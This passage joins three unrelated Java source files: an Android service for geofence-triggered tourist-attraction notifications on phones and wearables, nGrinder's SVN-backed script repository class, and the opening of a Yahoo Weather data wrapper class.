private static final String ACTION_LOCATION_UPDATED = "location_updated";
private static final String ACTION_REQUEST_LOCATION = "request_location";
private static final String ACTION_ADD_GEOFENCES = "add_geofences";
private static final String ACTION_CLEAR_NOTIFICATION = "clear_notification";
private static final String ACTION_CLEAR_REMOTE_NOTIFICATIONS = "clear_remote_notifications";
private static final String ACTION_FAKE_UPDATE = "fake_update";
private static final String EXTRA_TEST_MICROAPP = "test_microapp";
public static IntentFilter getLocationUpdatedIntentFilter() {
return new IntentFilter(UtilityService.ACTION_LOCATION_UPDATED);
}
public static void triggerWearTest(Context context, boolean microApp) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_FAKE_UPDATE);
intent.putExtra(EXTRA_TEST_MICROAPP, microApp);
context.startService(intent);
}
public static void addGeofences(Context context) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_ADD_GEOFENCES);
context.startService(intent);
}
public static void requestLocation(Context context) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_REQUEST_LOCATION);
context.startService(intent);
}
public static void clearNotification(Context context) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_CLEAR_NOTIFICATION);
context.startService(intent);
}
public static Intent getClearRemoteNotificationsIntent(Context context) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_CLEAR_REMOTE_NOTIFICATIONS);
return intent;
}
public UtilityService() {
super(TAG);
}
@Override
protected void onHandleIntent(Intent intent) {
String action = intent != null ? intent.getAction() : null;
if (ACTION_ADD_GEOFENCES.equals(action)) {
addGeofencesInternal();
} else if (ACTION_GEOFENCE_TRIGGERED.equals(action)) {
geofenceTriggered(intent);
} else if (ACTION_REQUEST_LOCATION.equals(action)) {
requestLocationInternal();
} else if (ACTION_LOCATION_UPDATED.equals(action)) {
locationUpdated(intent);
} else if (ACTION_CLEAR_NOTIFICATION.equals(action)) {
clearNotificationInternal();
} else if (ACTION_CLEAR_REMOTE_NOTIFICATIONS.equals(action)) {
clearRemoteNotifications();
} else if (ACTION_FAKE_UPDATE.equals(action)) {
LatLng currentLocation = Utils.getLocation(this);
// If location unknown use test city, otherwise use closest city
String city = currentLocation == null ? TouristAttractions.TEST_CITY :
TouristAttractions.getClosestCity(currentLocation);
showNotification(city,
intent.getBooleanExtra(EXTRA_TEST_MICROAPP, Constants.USE_MICRO_APP));
}
}
/**
* Add geofences using Play Services
*/
private void addGeofencesInternal() {
Log.v(TAG, ACTION_ADD_GEOFENCES);
GoogleApiClient googleApiClient = new GoogleApiClient.Builder(this)
.addApi(LocationServices.API)
.build();
// It's OK to use blockingConnect() here as we are running in an
// IntentService that executes work on a separate (background) thread.
ConnectionResult connectionResult = googleApiClient.blockingConnect(
Constants.GOOGLE_API_CLIENT_TIMEOUT_S, TimeUnit.SECONDS);
if (connectionResult.isSuccess() && googleApiClient.isConnected()) {
PendingIntent pendingIntent = PendingIntent.getBroadcast(
this, 0, new Intent(this, UtilityReceiver.class), 0);
GeofencingApi.addGeofences(googleApiClient,
TouristAttractions.getGeofenceList(), pendingIntent);
googleApiClient.disconnect();
} else {
Log.e(TAG, String.format(Constants.GOOGLE_API_CLIENT_ERROR_MSG,
connectionResult.getErrorCode()));
}
}
/**
* Called when a geofence is triggered
*/
private void geofenceTriggered(Intent intent) {
Log.v(TAG, ACTION_GEOFENCE_TRIGGERED);
// Check if geofences are enabled
boolean geofenceEnabled = Utils.getGeofenceEnabled(this);
// Extract the geofences from the intent
GeofencingEvent event = GeofencingEvent.fromIntent(intent);
List<Geofence> geofences = event.getTriggeringGeofences();
if (geofenceEnabled && geofences != null && geofences.size() > 0) {
if (event.getGeofenceTransition() == Geofence.GEOFENCE_TRANSITION_ENTER) {
// Trigger the notification based on the first geofence
showNotification(geofences.get(0).getRequestId(), Constants.USE_MICRO_APP);
} else if (event.getGeofenceTransition() == Geofence.GEOFENCE_TRANSITION_EXIT) {
// Clear notifications
clearNotificationInternal();
clearRemoteNotifications();
}
}
UtilityReceiver.completeWakefulIntent(intent);
}
/**
* Called when a location update is requested
*/
private void requestLocationInternal() {
Log.v(TAG, ACTION_REQUEST_LOCATION);
GoogleApiClient googleApiClient = new GoogleApiClient.Builder(this)
.addApi(LocationServices.API)
.build();
// It's OK to use blockingConnect() here as we are running in an
// IntentService that executes work on a separate (background) thread.
ConnectionResult connectionResult = googleApiClient.blockingConnect(
Constants.GOOGLE_API_CLIENT_TIMEOUT_S, TimeUnit.SECONDS);
if (connectionResult.isSuccess() && googleApiClient.isConnected()) {
Intent locationUpdatedIntent = new Intent(this, UtilityService.class);
locationUpdatedIntent.setAction(ACTION_LOCATION_UPDATED);
// Send last known location out first if available
Location location = FusedLocationApi.getLastLocation(googleApiClient);
if (location != null) {
Intent lastLocationIntent = new Intent(locationUpdatedIntent);
lastLocationIntent.putExtra(
FusedLocationProviderApi.KEY_LOCATION_CHANGED, location);
startService(lastLocationIntent);
}
// Request new location
LocationRequest mLocationRequest = new LocationRequest()
.setPriority(LocationRequest.PRIORITY_BALANCED_POWER_ACCURACY);
FusedLocationApi.requestLocationUpdates(
googleApiClient, mLocationRequest,
PendingIntent.getService(this, 0, locationUpdatedIntent, 0));
googleApiClient.disconnect();
} else {
Log.e(TAG, String.format(Constants.GOOGLE_API_CLIENT_ERROR_MSG,
connectionResult.getErrorCode()));
}
}
/**
* Called when the location has been updated
*/
private void locationUpdated(Intent intent) {
Log.v(TAG, ACTION_LOCATION_UPDATED);
// Extra new location
Location location =
intent.getParcelableExtra(FusedLocationProviderApi.KEY_LOCATION_CHANGED);
if (location != null) {
LatLng latLngLocation = new LatLng(location.getLatitude(), location.getLongitude());
// Store in a local preference as well
Utils.storeLocation(this, latLngLocation);
// Send a local broadcast so if an Activity is open it can respond
// to the updated location
LocalBroadcastManager.getInstance(this).sendBroadcast(intent);
}
}
/**
* Clears the local device notification
*/
private void clearNotificationInternal() {
Log.v(TAG, ACTION_CLEAR_NOTIFICATION);
NotificationManagerCompat.from(this).cancel(Constants.MOBILE_NOTIFICATION_ID);
}
/**
* Clears remote device notifications using the Wearable message API
*/
private void clearRemoteNotifications() {
Log.v(TAG, ACTION_CLEAR_REMOTE_NOTIFICATIONS);
GoogleApiClient googleApiClient = new GoogleApiClient.Builder(this)
.addApi(Wearable.API)
.build();
// It's OK to use blockingConnect() here as we are running in an
// IntentService that executes work on a separate (background) thread.
ConnectionResult connectionResult = googleApiClient.blockingConnect(
Constants.GOOGLE_API_CLIENT_TIMEOUT_S, TimeUnit.SECONDS);
if (connectionResult.isSuccess() && googleApiClient.isConnected()) {
// Loop through all nodes and send a clear notification message
Iterator<String> itr = Utils.getNodes(googleApiClient).iterator();
while (itr.hasNext()) {
Wearable.MessageApi.sendMessage(
googleApiClient, itr.next(), Constants.CLEAR_NOTIFICATIONS_PATH, null);
}
googleApiClient.disconnect();
}
}
/**
* Show the notification. Either the regular notification with wearable features
* added to enhance, or trigger the full micro app on the wearable.
*
* @param cityId The city to trigger the notification for
* @param microApp If the micro app should be triggered or just enhanced notifications
*/
private void showNotification(String cityId, boolean microApp) {
List<Attraction> attractions = ATTRACTIONS.get(cityId);
if (microApp) {
// If micro app we first need to transfer some data over
sendDataToWearable(attractions);
}
// The first (closest) tourist attraction
Attraction attraction = attractions.get(0);
// Limit attractions to send
int count = attractions.size() > Constants.MAX_ATTRACTIONS ?
Constants.MAX_ATTRACTIONS : attractions.size();
// Pull down the tourist attraction images from the network and store
HashMap<String, Bitmap> bitmaps = new HashMap<>();
try {
for (int i = 0; i < count; i++) {
bitmaps.put(attractions.get(i).name,
Glide.with(this)
.load(attractions.get(i).imageUrl)
.asBitmap()
.diskCacheStrategy(DiskCacheStrategy.SOURCE)
.into(Constants.WEAR_IMAGE_SIZE, Constants.WEAR_IMAGE_SIZE)
.get());
}
} catch (InterruptedException | ExecutionException e) {
Log.e(TAG, "Error fetching image from network: " + e);
}
// The intent to trigger when the notification is tapped
PendingIntent pendingIntent = PendingIntent.getActivity(this, 0,
DetailActivity.getLaunchIntent(this, attraction.name),
PendingIntent.FLAG_UPDATE_CURRENT);
// The intent to trigger when the notification is dismissed, in this case
// we want to clear remote notifications as well
PendingIntent deletePendingIntent =
PendingIntent.getService(this, 0, getClearRemoteNotificationsIntent(this), 0);
// Construct the main notification
NotificationCompat.Builder builder = new NotificationCompat.Builder(this)
.setStyle(new NotificationCompat.BigPictureStyle()
.bigPicture(bitmaps.get(attraction.name))
.setBigContentTitle(attraction.name)
.setSummaryText(getString(R.string.nearby_attraction))
)
.setLocalOnly(microApp)
.setContentTitle(attraction.name)
.setContentText(getString(R.string.nearby_attraction))
.setSmallIcon(R.drawable.ic_stat_maps_pin_drop)
.setContentIntent(pendingIntent)
.setDeleteIntent(deletePendingIntent)
.setColor(getResources().getColor(R.color.colorPrimary))
.setCategory(Notification.CATEGORY_RECOMMENDATION)
.setAutoCancel(true);
if (!microApp) {
// If not a micro app, create some wearable pages for
// the other nearby tourist attractions.
ArrayList<Notification> pages = new ArrayList<Notification>();
for (int i = 1; i < count; i++) {
// Calculate the distance from current location to tourist attraction
String distance = Utils.formatDistanceBetween(
Utils.getLocation(this), attractions.get(i).location);
// Construct the notification and add it as a page
pages.add(new NotificationCompat.Builder(this)
.setContentTitle(attractions.get(i).name)
.setContentText(distance)
.setSmallIcon(R.drawable.ic_stat_maps_pin_drop)
.extend(new NotificationCompat.WearableExtender()
.setBackground(bitmaps.get(attractions.get(i).name))
)
.build());
}
builder.extend(new NotificationCompat.WearableExtender().addPages(pages));
}
// Trigger the notification
NotificationManagerCompat.from(this).notify(
Constants.MOBILE_NOTIFICATION_ID, builder.build());
}
/**
* Transfer the required data over to the wearable
* @param attractions list of attraction data to transfer over
*/
private void sendDataToWearable(List<Attraction> attractions) {
GoogleApiClient googleApiClient = new GoogleApiClient.Builder(this)
.addApi(Wearable.API)
.build();
// It's OK to use blockingConnect() here as we are running in an
// IntentService that executes work on a separate (background) thread.
ConnectionResult connectionResult = googleApiClient.blockingConnect(
Constants.GOOGLE_API_CLIENT_TIMEOUT_S, TimeUnit.SECONDS);
// Limit attractions to send
int count = attractions.size() > Constants.MAX_ATTRACTIONS ?
Constants.MAX_ATTRACTIONS : attractions.size();
ArrayList<DataMap> attractionsData = new ArrayList<>(count);
for (int i = 0; i < count; i++) {
Attraction attraction = attractions.get(i);
Bitmap image = null;
Bitmap secondaryImage = null;
try {
// Fetch and resize attraction image bitmap
image = Glide.with(this)
.load(attraction.imageUrl)
.asBitmap()
.diskCacheStrategy(DiskCacheStrategy.SOURCE)
.into(Constants.WEAR_IMAGE_SIZE_PARALLAX_WIDTH, Constants.WEAR_IMAGE_SIZE)
.get();
secondaryImage = Glide.with(this)
.load(attraction.secondaryImageUrl)
.asBitmap()
.diskCacheStrategy(DiskCacheStrategy.SOURCE)
.into(Constants.WEAR_IMAGE_SIZE_PARALLAX_WIDTH, Constants.WEAR_IMAGE_SIZE)
.get();
} catch (InterruptedException | ExecutionException e) {
Log.e(TAG, "Exception loading bitmap from network");
}
if (image != null && secondaryImage != null) {
DataMap attractionData = new DataMap();
String distance = Utils.formatDistanceBetween(
Utils.getLocation(this), attraction.location);
attractionData.putString(Constants.EXTRA_TITLE, attraction.name);
attractionData.putString(Constants.EXTRA_DESCRIPTION, attraction.description);
attractionData.putDouble(
Constants.EXTRA_LOCATION_LAT, attraction.location.latitude);
attractionData.putDouble(
Constants.EXTRA_LOCATION_LNG, attraction.location.longitude);
attractionData.putString(Constants.EXTRA_DISTANCE, distance);
attractionData.putString(Constants.EXTRA_CITY, attraction.city);
attractionData.putAsset(Constants.EXTRA_IMAGE,
Utils.createAssetFromBitmap(image));
attractionData.putAsset(Constants.EXTRA_IMAGE_SECONDARY,
Utils.createAssetFromBitmap(secondaryImage));
attractionsData.add(attractionData);
}
}
if (connectionResult.isSuccess() && googleApiClient.isConnected()
&& attractionsData.size() > 0) {
PutDataMapRequest dataMap = PutDataMapRequest.create(Constants.ATTRACTION_PATH);
dataMap.getDataMap().putDataMapArrayList(Constants.EXTRA_ATTRACTIONS, attractionsData);
dataMap.getDataMap().putLong(Constants.EXTRA_TIMESTAMP, new Date().getTime());
PutDataRequest request = dataMap.asPutDataRequest();
// Send the data over
DataApi.DataItemResult result =
Wearable.DataApi.putDataItem(googleApiClient, request).await();
if (!result.getStatus().isSuccess()) {
Log.e(TAG, String.format("Error sending data using DataApi (error code = %d)",
result.getStatus().getStatusCode()));
}
} else {
Log.e(TAG, String.format(Constants.GOOGLE_API_CLIENT_ERROR_MSG,
connectionResult.getErrorCode()));
}
googleApiClient.disconnect();
}
}
|
|
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.ngrinder.script.repository;
import org.apache.commons.io.FilenameUtils;
import org.apache.commons.io.IOUtils;
import org.apache.commons.io.output.ByteArrayOutputStream;
import org.apache.commons.lang.StringUtils;
import org.ngrinder.common.exception.NGrinderRuntimeException;
import org.ngrinder.common.model.Home;
import org.ngrinder.common.util.EncodingUtils;
import org.ngrinder.infra.config.Config;
import org.ngrinder.model.User;
import org.ngrinder.script.model.FileCategory;
import org.ngrinder.script.model.FileEntry;
import org.ngrinder.script.model.FileType;
import org.ngrinder.user.repository.UserRepository;
import org.ngrinder.user.service.UserContext;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Profile;
import org.springframework.stereotype.Component;
import org.tmatesoft.svn.core.*;
import org.tmatesoft.svn.core.auth.ISVNAuthenticationManager;
import org.tmatesoft.svn.core.internal.io.fs.FSRepositoryFactory;
import org.tmatesoft.svn.core.internal.wc.DefaultSVNOptions;
import org.tmatesoft.svn.core.io.ISVNEditor;
import org.tmatesoft.svn.core.io.SVNRepository;
import org.tmatesoft.svn.core.io.diff.SVNDeltaGenerator;
import org.tmatesoft.svn.core.wc.SVNClientManager;
import org.tmatesoft.svn.core.wc.SVNRevision;
import org.tmatesoft.svn.core.wc.SVNWCUtil;
import javax.annotation.PostConstruct;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.util.EmptyStackException;
import java.util.List;
import java.util.Map.Entry;
import static org.ngrinder.common.util.CollectionUtils.newArrayList;
import static org.ngrinder.common.util.ExceptionUtils.processException;
import static org.ngrinder.common.util.NoOp.noOp;
import static org.ngrinder.common.util.Preconditions.checkNotNull;
/**
* SVN FileEntity repository.
*
* This class save and retrieve {@link FileEntry} from Local SVN folders.
*
* @author JunHo Yoon
* @since 3.0
*/
@Profile("production")
@Component
public class FileEntryRepository {
private static final Logger LOG = LoggerFactory.getLogger(FileEntryRepository.class);
@Autowired
private Config config;
private Home home;
private File subversionHome;
/**
* Initialize the {@link FileEntryRepository}. This method should be
* performed to set up FS Repository.
*/
@PostConstruct
public void init() {
FSRepositoryFactory.setup();
home = config.getHome();
subversionHome = home.getSubFile("subversion");
}
@Autowired
private UserRepository userRepository;
/**
* Get user repository.
*
* For unit test, This can be overridable.
*
* @param user the user
* @return user repository path.
*/
public File getUserRepoDirectory(User user) {
return home.getUserRepoDirectory(user.getUserId());
}
/**
* Return all {@link FileEntry}s under the given path.
*
* @param user user
* @param path path under which files are searched.
* @param revision . null if head.
* @return found {@link FileEntry}s
*/
public List<FileEntry> findAll(User user, final String path, Long revision) {
return findAll(user, path, revision, false);
}
/**
* Return all {@link FileEntry}s under the given path.
*
* @param user user
* @param path path under which files are searched.
* @param revision null if head.
* @param recursive true if recursive finding
* @return found {@link FileEntry}s
*/
public List<FileEntry> findAll(User user, final String path, Long revision, boolean recursive) {
SVNRevision svnRevision = SVNRevision.HEAD;
if (revision != null && -1L != revision) {
svnRevision = SVNRevision.create(revision);
}
final List<FileEntry> fileEntries = newArrayList();
SVNClientManager svnClientManager = getSVNClientManager();
try {
svnClientManager.getLogClient().doList(SVNURL.fromFile(getUserRepoDirectory(user)).appendPath(path, true),
svnRevision, svnRevision, true, recursive, new ISVNDirEntryHandler() {
@Override
public void handleDirEntry(SVNDirEntry dirEntry) throws SVNException {
FileEntry script = new FileEntry();
// Exclude base path "/"
if (StringUtils.isBlank(dirEntry.getRelativePath())) {
return;
}
script.setPath(FilenameUtils.normalize(path + "/" + dirEntry.getRelativePath(), true));
script.setCreatedDate(dirEntry.getDate());
script.setLastModifiedDate(dirEntry.getDate());
script.setDescription(dirEntry.getCommitMessage());
script.setRevision(dirEntry.getRevision());
if (dirEntry.getKind() == SVNNodeKind.DIR) {
script.setFileType(FileType.DIR);
} else {
script.getFileType();
script.setFileSize(dirEntry.getSize());
}
fileEntries.add(script);
}
});
} catch (Exception e) {
LOG.debug("findAll() to the not existing folder {}", path);
} finally {
closeSVNClientManagerQuietly(svnClientManager);
}
return fileEntries;
}
/**
* Return all {@link FileEntry}s which user have. It excludes
* {@link FileType#DIR} entries.
*
* @param user user
* @return found {@link FileEntry}s
*/
public List<FileEntry> findAll(final User user) {
final List<FileEntry> scripts = newArrayList();
SVNClientManager svnClientManager = getSVNClientManager();
try {
svnClientManager.getLogClient().doList(SVNURL.fromFile(getUserRepoDirectory(user)), SVNRevision.HEAD,
SVNRevision.HEAD, false, true, new ISVNDirEntryHandler() {
@Override
public void handleDirEntry(SVNDirEntry dirEntry) throws SVNException {
FileEntry script = new FileEntry();
String relativePath = dirEntry.getRelativePath();
if (StringUtils.isBlank(relativePath)) {
return;
}
script.setCreatedDate(dirEntry.getDate());
script.setLastModifiedDate(dirEntry.getDate());
script.setPath(relativePath);
script.setDescription(dirEntry.getCommitMessage());
long reversion = dirEntry.getRevision();
script.setRevision(reversion);
script.setFileType(dirEntry.getKind() == SVNNodeKind.DIR ? FileType.DIR : null);
script.setFileSize(dirEntry.getSize());
scripts.add(script);
}
});
} catch (Exception e) {
LOG.error("Error while fetching files from SVN for {}", user.getUserId());
LOG.debug("Error details :", e);
throw new NGrinderRuntimeException(e);
} finally {
closeSVNClientManagerQuietly(svnClientManager);
}
return scripts;
}
/**
* Return a {@link FileEntry} for the given path and revision.
*
* @param user user
* @param path path in the svn repo
* @param revision revision of the file
* @return found {@link FileEntry}, null if not found
*/
public FileEntry findOne(User user, String path, SVNRevision revision) {
final FileEntry script = new FileEntry();
SVNClientManager svnClientManager = null;
ByteArrayOutputStream outputStream = null;
try {
svnClientManager = getSVNClientManager();
SVNURL userRepoUrl = SVNURL.fromFile(getUserRepoDirectory(user));
if (userRepoUrl == null) {
return null;
}
SVNRepository repo = svnClientManager.createRepository(userRepoUrl, true);
SVNNodeKind nodeKind = repo.checkPath(path, -1);
if (nodeKind == SVNNodeKind.NONE) {
return null;
}
outputStream = new ByteArrayOutputStream();
SVNProperties fileProperty = new SVNProperties();
// Get File.
repo.getFile(path, revision.getNumber(), fileProperty, outputStream);
SVNDirEntry lastRevisionedEntry = repo.info(path, -1);
long lastRevisionNumber = (lastRevisionedEntry == null) ? -1 : lastRevisionedEntry.getRevision();
String revisionStr = fileProperty.getStringValue(SVNProperty.REVISION);
long revisionNumber = Long.parseLong(revisionStr);
SVNDirEntry info = repo.info(path, revisionNumber);
byte[] byteArray = outputStream.toByteArray();
script.setPath(path);
for (String name : fileProperty.nameSet()) {
script.getProperties().put(name, fileProperty.getStringValue(name));
}
script.setFileType(FileType.getFileTypeByExtension(FilenameUtils.getExtension(script.getFileName())));
if (script.getFileType().isEditable()) {
String autoDetectedEncoding = EncodingUtils.detectEncoding(byteArray, "UTF-8");
script.setContent(new String(byteArray, autoDetectedEncoding));
script.setEncoding(autoDetectedEncoding);
script.setContentBytes(byteArray);
} else {
script.setContentBytes(byteArray);
}
script.setDescription(info.getCommitMessage());
script.setRevision(revisionNumber);
script.setLastRevision(lastRevisionNumber);
script.setCreatedUser(user);
} catch (Exception e) {
LOG.error("Error while fetching a file from SVN {}", user.getUserId() + "_" + path, e);
return null;
} finally {
closeSVNClientManagerQuietly(svnClientManager);
IOUtils.closeQuietly(outputStream);
}
return script;
}
private void addPropertyValue(ISVNEditor editor, FileEntry fileEntry) throws SVNException {
if (fileEntry.getFileType().getFileCategory() == FileCategory.SCRIPT) {
editor.changeFileProperty(fileEntry.getPath(), "targetHosts", SVNPropertyValue.create(""));
}
for (Entry<String, String> each : fileEntry.getProperties().entrySet()) {
editor.changeFileProperty(fileEntry.getPath(), each.getKey(), SVNPropertyValue.create(each.getValue()));
}
}
/**
* Save fileEntry on the {@link FileEntry.getPath()} location.
*
* @param user the user
* @param fileEntry fileEntry to be saved
* @param encoding file encoding with which fileEntry is saved. It is meaningful
* only FileEntry is editable.
*/
public void save(User user, FileEntry fileEntry, String encoding) {
SVNClientManager svnClientManager = null;
ISVNEditor editor = null;
String checksum = null;
InputStream bais = null;
try {
svnClientManager = getSVNClientManager();
SVNRepository repo = svnClientManager.createRepository(SVNURL.fromFile(getUserRepoDirectory(user)), true);
SVNDirEntry dirEntry = repo.info(fileEntry.getPath(), -1);
// Add base paths
String fullPath = "";
// Check.. first
for (String each : getPathFragment(fileEntry.getPath())) {
fullPath = fullPath + "/" + each;
SVNDirEntry folderStepEntry = repo.info(fullPath, -1);
if (folderStepEntry != null && folderStepEntry.getKind() == SVNNodeKind.FILE) {
throw processException("User " + user.getUserId() + " tried to create folder "
+ fullPath + ". It's file..");
}
}
editor = repo.getCommitEditor(fileEntry.getDescription(), null, true, null);
editor.openRoot(-1);
fullPath = "";
for (String each : getPathFragment(fileEntry.getPath())) {
fullPath = fullPath + "/" + each;
try {
editor.addDir(fullPath, null, -1);
} catch (Exception e) {
// FALL THROUGH
noOp();
}
}
if (fileEntry.getFileType() == FileType.DIR) {
editor.addDir(fileEntry.getPath(), null, -1);
} else {
if (dirEntry == null) {
// If it's new file
editor.addFile(fileEntry.getPath(), null, -1);
} else {
// If it's modification
editor.openFile(fileEntry.getPath(), -1);
}
editor.applyTextDelta(fileEntry.getPath(), null);
// Calc diff
final SVNDeltaGenerator deltaGenerator = new SVNDeltaGenerator();
if (fileEntry.getContentBytes() == null && fileEntry.getFileType().isEditable()) {
bais = new ByteArrayInputStream(checkNotNull(fileEntry.getContent()).getBytes(
encoding == null ? "UTF-8" : encoding));
} else {
bais = new ByteArrayInputStream(fileEntry.getContentBytes());
}
checksum = deltaGenerator.sendDelta(fileEntry.getPath(), bais, editor, true);
}
addPropertyValue(editor, fileEntry);
editor.closeFile(fileEntry.getPath(), checksum);
} catch (Exception e) {
abortSVNEditorQuietly(editor);
// If it's adding the folder which already exists... ignore..
if (e instanceof SVNException && fileEntry.getFileType() == FileType.DIR) {
if (SVNErrorCode.FS_ALREADY_EXISTS.equals(((SVNException) e).getErrorMessage().getErrorCode())) {
return;
}
}
LOG.error("Error while saving file to SVN", e);
throw processException("Error while saving file to SVN", e);
} finally {
closeSVNEditorQuietly(editor);
closeSVNClientManagerQuietly(svnClientManager);
IOUtils.closeQuietly(bais);
}
}
String[] getPathFragment(String path) {
String basePath = FilenameUtils.getPath(path);
return StringUtils.split(FilenameUtils.separatorsToUnix(basePath), "/");
}
/**
* Quietly close svn editor.
*
* @param editor editor to be closed.
*/
private void abortSVNEditorQuietly(ISVNEditor editor) {
if (editor == null) {
return;
}
try {
editor.abortEdit();
} catch (SVNException e) {
// FALL THROUGH
noOp();
}
}
/**
* Quietly close svn editor. This is convenient method.
*
* @param editor editor to be closed.
*/
private void closeSVNEditorQuietly(ISVNEditor editor) {
if (editor == null) {
return;
}
try {
// recursively close
//noinspection InfiniteLoopStatement
while (true) {
editor.closeDir();
}
} catch (EmptyStackException e) {
// FALL THROUGH
noOp();
} catch (SVNException e) {
// FALL THROUGH
noOp();
} finally {
try {
editor.closeEdit();
} catch (SVNException e) {
// FALL THROUGH
noOp();
}
}
}
/**
* Delete file entries on given paths. If the one of paths does not exist,
* all deletion is canceled.
*
* @param user user
* @param paths paths of file entries.
*/
public void delete(User user, List<String> paths) {
SVNClientManager svnClientManager = null;
ISVNEditor editor = null;
try {
svnClientManager = getSVNClientManager();
SVNRepository repo = svnClientManager.createRepository(SVNURL.fromFile(getUserRepoDirectory(user)), true);
editor = repo.getCommitEditor("delete", null, true, null);
editor.openRoot(-1);
for (String each : paths) {
editor.deleteEntry(each, -1);
}
} catch (Exception e) {
abortSVNEditorQuietly(editor);
LOG.error("Error while deleting file from SVN", e);
throw processException("Error while deleting files from SVN", e);
} finally {
closeSVNEditorQuietly(editor);
closeSVNClientManagerQuietly(svnClientManager);
}
}
@Autowired
UserContext userContext;
/**
* Get svn client manager with the designated subversionHome.
*
* @return svn client manager
*/
public SVNClientManager getSVNClientManager() {
DefaultSVNOptions options = SVNWCUtil.createDefaultOptions(subversionHome, true);
ISVNAuthenticationManager authManager = SVNWCUtil.createDefaultAuthenticationManager(subversionHome,
getCurrentUserId(), null, false);
return SVNClientManager.newInstance(options, authManager);
}
protected String getCurrentUserId() {
try {
return userContext.getCurrentUser().getUserId();
} catch (Exception e) {
return "default";
}
}
private void closeSVNClientManagerQuietly(SVNClientManager svnClientManager) {
if (svnClientManager != null) {
svnClientManager.dispose();
}
}
/**
* Check file existence.
*
* @param user user
* @param path path in user repo
* @return true if exists.
*/
public boolean hasOne(User user, String path) {
SVNClientManager svnClientManager = null;
try {
svnClientManager = getSVNClientManager();
SVNURL userRepoUrl = SVNURL.fromFile(getUserRepoDirectory(user));
SVNRepository repo = svnClientManager.createRepository(userRepoUrl, true);
SVNNodeKind nodeKind = repo.checkPath(path, -1);
return (nodeKind != SVNNodeKind.NONE);
} catch (Exception e) {
LOG.error("Error while fetching files from SVN", e);
throw processException("Error while checking file existence from SVN", e);
} finally {
closeSVNClientManagerQuietly(svnClientManager);
}
}
/**
* Copy {@link FileEntry} to the given path.
*
* This method only work for the file not dir.
*
* @param user user
* @param path path of {@link FileEntry}
* @param toPathDir file dir path to write.
*/
public void writeContentTo(User user, String path, File toPathDir) {
SVNClientManager svnClientManager = null;
FileOutputStream fileOutputStream = null;
try {
svnClientManager = getSVNClientManager();
SVNURL userRepoUrl = SVNURL.fromFile(getUserRepoDirectory(user));
SVNRepository repo = svnClientManager.createRepository(userRepoUrl, true);
SVNNodeKind nodeKind = repo.checkPath(path, -1);
// If it's DIR, it does not work.
if (nodeKind == SVNNodeKind.NONE || nodeKind == SVNNodeKind.DIR) {
throw processException("It's not possible to write directory. nodeKind is " + nodeKind);
}
//noinspection ResultOfMethodCallIgnored
toPathDir.mkdirs();
File destFile = new File(toPathDir, FilenameUtils.getName(path));
// Prepare parent folders
fileOutputStream = new FileOutputStream(destFile);
SVNProperties fileProperty = new SVNProperties();
// Get file.
repo.getFile(path, -1L, fileProperty, fileOutputStream);
} catch (Exception e) {
LOG.error("Error while fetching files from SVN", e);
throw processException("Error while fetching files from SVN", e);
} finally {
closeSVNClientManagerQuietly(svnClientManager);
IOUtils.closeQuietly(fileOutputStream);
}
}
}
|
|
/*
* Copyright (C) 2011 The Android Open Source Project
* Copyright (C) 2012 Zhenghong Wang
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.phildatoon.weather;
import java.util.ArrayList;
import java.util.List;
import android.annotation.SuppressLint;
import android.graphics.Bitmap;
/**
* A wrapper for all weather information provided by Yahoo! Weather APIs.
* @author Zhenghong Wang
*/
public class WeatherInfo {
String mTitle;
String mDescription;
String mLanguage;
String mLastBuildDate;
String mLocationCity;
String mLocationRegion; // region may be null
String mLocationCountry;
String mWindChill;
String mWindDirection;
String mWindSpeed;
String mAtmosphereHumidity;
String mAtmosphereVisibility;
String mAtmospherePressure;
String mAtmosphereRising;
String mAstronomySunrise;
String mAstronomySunset;
String mConditionTitle;
String mConditionLat;
String mConditionLon;
/*
* information in tag "yweather:condition"
*/
int mCurrentCode;
String mCurrentText;
int mCurrentTempC;
int mCurrentTempF;
String mCurrentConditionIconURL;
Bitmap mCurrentConditionIcon;
String mCurrentConditionDate;
/*
* information in the first tag "yweather:forecast"
*/
/*
* information in the second tag "yweather:forecast"
*/
ForecastInfo mForecastInfo1 = new ForecastInfo();
ForecastInfo mForecastInfo2 = new ForecastInfo();
ForecastInfo mForecastInfo3 = new ForecastInfo();
ForecastInfo mForecastInfo4 = new ForecastInfo();
ForecastInfo mForecastInfo5 = new ForecastInfo();
ForecastInfo mForecastInfo6 = new ForecastInfo();
ForecastInfo mForecastInfo7 = new ForecastInfo();
private List<ForecastInfo> mForecastInfoList;
public WeatherInfo() {
mForecastInfoList = new ArrayList<WeatherInfo.ForecastInfo>();
mForecastInfoList.add(mForecastInfo1);
mForecastInfoList.add(mForecastInfo2);
mForecastInfoList.add(mForecastInfo3);
mForecastInfoList.add(mForecastInfo4);
mForecastInfoList.add(mForecastInfo5);
mForecastInfoList.add(mForecastInfo6);
mForecastInfoList.add(mForecastInfo7);
}
public List<ForecastInfo> getForecastInfoList() {
return mForecastInfoList;
}
protected void setForecastInfoList(List<ForecastInfo> forecastInfoList) {
mForecastInfoList = forecastInfoList;
}
public ForecastInfo getForecastInfo1() {
return mForecastInfo1;
}
protected void setForecastInfo1(ForecastInfo forecastInfo1) {
